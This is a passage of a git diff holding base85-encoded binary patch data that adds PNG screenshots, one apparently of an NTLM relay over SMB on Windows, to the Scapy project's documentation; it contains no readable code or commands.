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 literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_smb_win1.png b/doc/scapy/graphics/ntlm/ntlmrelay_smb_win1.png new file mode 100644 index 0000000000000000000000000000000000000000..e35dd103bf2aff50a3d1a103aa29608b5c78599a GIT binary patch literal 64555 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 